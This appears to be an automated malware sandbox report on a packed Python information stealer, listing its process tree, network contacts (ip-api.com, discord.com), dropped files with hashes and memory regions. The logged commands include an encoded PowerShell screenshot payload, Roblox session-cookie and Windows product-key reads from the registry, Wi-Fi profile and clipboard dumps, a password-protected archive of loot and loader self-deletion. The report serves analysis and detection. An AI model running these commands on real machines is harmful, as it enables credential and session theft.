IAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w04kdbgn\w04kdbgn.cmdline"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62C1.tmp" "c:\Users\Admin\AppData\Local\Temp\w04kdbgn\CSC377B9FBE79E241CD866FDE2206C341F.TMP"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI5402\rar.exe a -r -hp"horns123" "C:\Users\Admin\AppData\Local\Temp\CCpx7.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI5402\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI5402\rar.exe a -r -hp"horns123" "C:\Users\Admin\AppData\Local\Temp\CCpx7.zip" *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\loader.exe""

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 16.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI5402\python311.dll

MD5 711da56eb35a88095f2baad0e821aa24
SHA1 2755f0d62c54642e936b63974fecc48a971e02e8
SHA256 d8c4c37f8826d9f906686a6b89ba3e37ee766be2893b0a7a9f49fd74f3e6f7a6
SHA512 556151238325dcd7b6d24864b39414cb0d4c2b18e98ac2446a2939bf0312d5b58128f6601e739c300bf3a38c4ddb84078a7b2e800d4e59875c21e23468e38a01

C:\Users\Admin\AppData\Local\Temp\_MEI5402\VCRUNTIME140.dll

MD5 1d4ff3cf64ab08c66ae9a4013c89a3ac
SHA1 f9ee15d0e9b0b7e04ff4c8a5de5afcffe8b2527b
SHA256 65f620bc588d95fe2ed236d1602e49f89077b434c83102549eed137c7fdc7220
SHA512 65fbd68843280e933620c470e524fba993ab4c48ede4bc0917b4ebe25da0408d02daec3f5afcd44a3ff8aba676d2eff2dda3f354029d27932ef39c9fdea51c26

memory/1696-25-0x00000000750E0000-0x00000000755F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI5402\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_ctypes.pyd

MD5 c917494b6c8c29361e42072dd17ade16
SHA1 f06b04f2c2cf9d84b7d25bb9aeebc6436d2b2bdf
SHA256 bf1454154ea8b62616461660e084c13d199f0570dc14f0e02d25b053f63ce300
SHA512 b064494c6c292969a8694f006f691b9ba00181a1d11c310ddfaa94f3b908248e5098a9e322008ee081e215c1aeed5b6c4bfeab7ac84e0dd88999fc094b4f672f

C:\Users\Admin\AppData\Local\Temp\_MEI5402\libffi-8.dll

MD5 50d1bacecfb4df4b7f4080803cb07e4a
SHA1 e4fd81cc1de13291f5a113f386e831396d6db41d
SHA256 d555fc44125cfa750721ecd47ef64b5e1ecebbe5e94e25ea47c78dd797a94c6f
SHA512 12f9a4989ce535f3907b894589c9df18832c057d58d0674340c80d28171fdd6b2c4a1f0f581083ce4167e51013b913f05b694b370dbc3bfc43a3528814168156

C:\Users\Admin\AppData\Local\Temp\_MEI5402\sqlite3.dll

MD5 b2a51ffbb7178ad2ccb0fab921632b6d
SHA1 3d20de641c4f07d4f5cdb55a73e9f6db3d2df4b0
SHA256 8fd5e24c37b48442f0627fbdda965fc0daab1c943b54afdb86170af9bc743054
SHA512 c5988f6db64f0a1eac7cf377f46f6311e09c334e5f765d995e1611ec224944d6db151edeb27530c1c8b6e4d917ba8d5dfd69537728f729124357979aca136f5a

C:\Users\Admin\AppData\Local\Temp\_MEI5402\libssl-3.dll

MD5 600f861907d668d914d16a277b845d04
SHA1 f37452a1bf601a156f12f927e97a005d0763fcac
SHA256 677b0d256dc23818ee27799f92fe3795f0e75b57e707fcc3897062db673c0926
SHA512 0ffc4f578de4af6b397e76e696b58973e2928f9f4dacd02a73993945497310d6acdbefaaa0a5c75eb1f8052c1ef18189b57989db0183fe50a66b0c3d7264e17c

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_ssl.pyd

MD5 b0b8317d4311645ef24652afc8253cbf
SHA1 c3e54221e31432cc4cf2a18e79617391be445ffb
SHA256 d1da4f2983a8621b5b9a17fa6f603a9e7c3342f130eaacb36003ca7868935719
SHA512 8812394a68bcc1aa50776e0b3cb5c4acd979621b84a29db9930f137f510e4db1106ff07083d23c37ff338f55474a65349162e2ff51b5c49ad375a94efeab057e

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_sqlite3.pyd

MD5 648d185e67616e97457ab675d4c230b5
SHA1 5db9230c200c6a6ee29aec12f68aaed9aab0c3c8
SHA256 0e9442dda8326e3006d1e367fcf8eb8eb3fb328341aaa0ab0f3c5a4345770cce
SHA512 02726e221f9e0faa68ea36dc601da57de1ebd77905055e7d8b66c6ab643e50f58b422f490c6048a373ddbb5208e94e98875b3a043e598f487ac330b962237c6a

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_socket.pyd

MD5 722d7afdd01ec565a432cce7d8bfd8ed
SHA1 e7c6bab41e0fc79a247eeb014d584b507fd37a96
SHA256 6eeeac340cabb9e8ac3aef6d63e3891ef830817894de18f42f78459b3ff9d4a6
SHA512 6480d57eec5c59510e9401edf55aa1e8b1ea816a8e4263fcaf98a4fc4f91e4126b1cafad822ca2163329c339bfa7c24ecd51302ff543fcdb7e68b9917b7e6526

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_queue.pyd

MD5 f002633067073ce11b6b7397c2a48624
SHA1 7c9242a89f75b20ef19817425b3c88c17a23ddda
SHA256 90a5855f580838f5810f1d866380fc4a6cf7b16afb57e214b3fc49b27dcb0676
SHA512 1b6301cb2df1276806dd5f8671d11f3ce91841ad3cee92633cb86d648d8285ced5a77aac064a1108451745c466c494eb16cf74d4a56dc6d6204f681238da8d16

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_lzma.pyd

MD5 6ff7a730ddd5f767aa1975d3784c35a9
SHA1 64b89b1d29d66cf794f6fc3b30ea0f467d2e05c8
SHA256 f17f1359bfa5e65b504c0d1b9e949e755b4d36bc3d9d34dfe24207371e3be92a
SHA512 335d7ec2d76967bf04b53fa17ce5d0205f6cd4f22521fab21384cabc43c968a7b26efe77f779d60380a7262f4ccc2e7877ad26ef4784061390eee517f3b83115

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_hashlib.pyd

MD5 fc7927b65769cf47c6299402acdff309
SHA1 ab31ac116af567e551e5de9c6a5d69e98726b561
SHA256 f99a9e0c3df7de17123588c9f8db37c7ac79b7868084efcc706bd73644d06c75
SHA512 80a6ed86dba65df5619d402a0465dc9e696508623dfcaf6e0ebc5a5fc2da891f9e9694abad00e281cbead015e42e7aec674fb233c9a6140c4fd1d2f3111252f2

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_decimal.pyd

MD5 35642e5645ccfa5fa3616a4f171c6ab0
SHA1 b555808ca4ba195941ad9b50fe95f9d6ce0a8d50
SHA256 f57bd98ca4c2a7a67e6104e6eab7acf7f6a0c0f09d88efcb1688d67e298b6d7c
SHA512 4eb499dd35002982b4b37fe27a870b8a53248657e01b9aeaf25d2485c9fbef474d2f2cbe1e945b1301c87db840913d9cb802ba861e10f59010ae2e5a50f044ed

C:\Users\Admin\AppData\Local\Temp\_MEI5402\_bz2.pyd

MD5 524989939f0351e080644e8c34ccfae5
SHA1 5d8974926381f844118c8b5455d0e7e133f7566c
SHA256 2fd24d9893d41508d1736972f1a4fb241c93beaa49895977e563faf8214410de
SHA512 f6800a7eb6f655e8ebd2c2c33da02252a019ab3085d1947dd50a69206fc2be912c8e11ff10119c4374996248c0ef4d92462043dce4bc08065ebbd12ba82cbaf4

C:\Users\Admin\AppData\Local\Temp\_MEI5402\unicodedata.pyd

MD5 6a414e240bd7075c730f0873c3d66cbe
SHA1 22e5f2aee0f0342114aff9d959dfc826c63a86c4
SHA256 e249ff5b219e838f6198a256b64a70025877c797e65cbffc2eda594a76e1c1ac
SHA512 e5c626388bf7f0d93bd6bf89e8f723a413311e98807e32458cff8ab0d95519402e708d73446486db60b9faa010aebfdec0ac78a9bf9551fbaa33a396510682dc

C:\Users\Admin\AppData\Local\Temp\_MEI5402\libcrypto-3.dll

MD5 113de1bf32512cb3c521bb6f7b5b11c0
SHA1 9387afface76e420735d2f32646b12698ccb4f18
SHA256 d7e56c6b5c73d67a7e7c5e73700f1696e944eb013f3d14ff9f983c4f93594d01
SHA512 f97f9c8952b40f686a119111585c3231d23dc33edab7f557ac6f69f82e83d0ea375b67aa036e9b339853ee388cc62cac55e23b5a9323d8492b35ca9ba3e9f8e8

C:\Users\Admin\AppData\Local\Temp\_MEI5402\blank.aes

MD5 6554a933c75d4574537c3e78be9925bf
SHA1 ab7d62e8bb381dc63682549217ef4605b8da178c
SHA256 c4609589c8524c9000b85c4db66732fdb4b95593f4650541617426f2ce07fe26
SHA512 b297aabedd88e5475c71f9419831d18265280be3f5bd81673254536e53209f9d6714f5f1cefa60913b2455cbf053d0275071f80a39bc5c6dd5503f0406dd53d9

memory/1696-32-0x0000000075080000-0x000000007508D000-memory.dmp

memory/1696-31-0x0000000075090000-0x00000000750AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI5402\select.pyd

MD5 cb4299085672ed660952b896cd01ee28
SHA1 40b352d2afd264ed7bf3606dd867a83d5cffa30c
SHA256 0ad2612b3507ddbae829fb57b6ac7502edc21dcce331cbd415f229ff0d558250
SHA512 47c0ba29aeca732c9e2276e13f87c11a14764dfd47d6f0499034cdddcbb6d1ddd29cd0d8ee87bf7429bdcac5fff187ea4306ffd1e8bc026847e7e24556489f35

C:\Users\Admin\AppData\Local\Temp\_MEI5402\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI5402\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

memory/1696-54-0x0000000075050000-0x0000000075077000-memory.dmp

memory/1696-56-0x0000000075030000-0x0000000075048000-memory.dmp

memory/1696-58-0x0000000075010000-0x000000007502B000-memory.dmp

memory/1696-60-0x0000000074ED0000-0x0000000075007000-memory.dmp

memory/1696-62-0x0000000074EB0000-0x0000000074EC6000-memory.dmp

memory/1696-64-0x0000000074E60000-0x0000000074E6C000-memory.dmp

memory/1696-71-0x00000000749F0000-0x0000000074D7C000-memory.dmp

memory/1696-73-0x0000000074D80000-0x0000000074E29000-memory.dmp

memory/1696-72-0x0000000003DC0000-0x000000000414C000-memory.dmp

memory/1696-70-0x0000000074E30000-0x0000000074E5C000-memory.dmp

memory/1696-69-0x00000000750E0000-0x00000000755F0000-memory.dmp

memory/1696-82-0x0000000074850000-0x0000000074968000-memory.dmp

memory/1696-81-0x0000000074970000-0x000000007497C000-memory.dmp

memory/1696-76-0x0000000074980000-0x0000000074990000-memory.dmp

memory/1696-75-0x0000000075090000-0x00000000750AE000-memory.dmp

memory/1540-84-0x0000000073E6E000-0x0000000073E6F000-memory.dmp

memory/1696-83-0x0000000075030000-0x0000000075048000-memory.dmp

memory/2168-85-0x0000000004BB0000-0x0000000004BE6000-memory.dmp

memory/2168-86-0x0000000005310000-0x0000000005938000-memory.dmp

memory/1540-89-0x00000000058E0000-0x0000000005946000-memory.dmp

memory/1540-88-0x0000000005870000-0x00000000058D6000-memory.dmp

memory/1540-87-0x00000000057D0000-0x00000000057F2000-memory.dmp

memory/1540-99-0x0000000005960000-0x0000000005CB4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2fbb21bx.pxq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2168-152-0x0000000006150000-0x000000000616E000-memory.dmp

memory/2168-153-0x0000000006680000-0x00000000066CC000-memory.dmp

memory/2168-205-0x0000000007330000-0x0000000007362000-memory.dmp

memory/2168-217-0x0000000007370000-0x0000000007413000-memory.dmp

memory/2168-216-0x0000000006710000-0x000000000672E000-memory.dmp

memory/2168-206-0x000000006FA90000-0x000000006FADC000-memory.dmp

memory/1540-219-0x000000006FA90000-0x000000006FADC000-memory.dmp

